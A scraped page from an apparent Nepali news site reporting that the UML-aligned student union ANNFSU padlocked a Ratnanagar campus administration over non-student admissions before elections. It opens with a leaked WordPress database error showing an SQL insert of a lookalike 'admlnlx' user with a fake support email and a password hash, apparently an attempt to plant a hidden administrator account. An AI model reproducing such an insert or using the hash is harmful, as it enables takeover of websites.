WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwkiqaIMWWs4ls1iL9GsK3VGzQNOGM/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 07:47:18', '', 'admlnlx', 'admlnlx')
सन्तोष भण्डारी,
चितवन, माघ २३–
एमाले निकट विद्यार्थी संगठन अनेरास्ववियु क्याम्पस कमिटीले रत्ननगरको शहीद स्मृति बहुमुखी क्याम्पसको प्रशासनमा आज तालाबन्दी गरेको छ ।
स्ववियु निर्बाचन नजिकिदै गर्दा गैर विद्यार्थीको भर्ना रोक्नुपर्ने माग गर्दै अनेरास्ववियुले क्याम्पस प्रशासनमा तालाबन्दी गरेको हो ।
स्ववियु चुनाब भाड्ने, गुण्डागर्दी र पैसाको आडमा क्याम्पसमा राजनीति गर्नेलाई भर्ना नलिन माग गर्दै तालाबन्दी गरिएको क्याम्पस कमिटीका अध्यक्ष सरोज तिमिल्सिनाले जानकारी दिए ।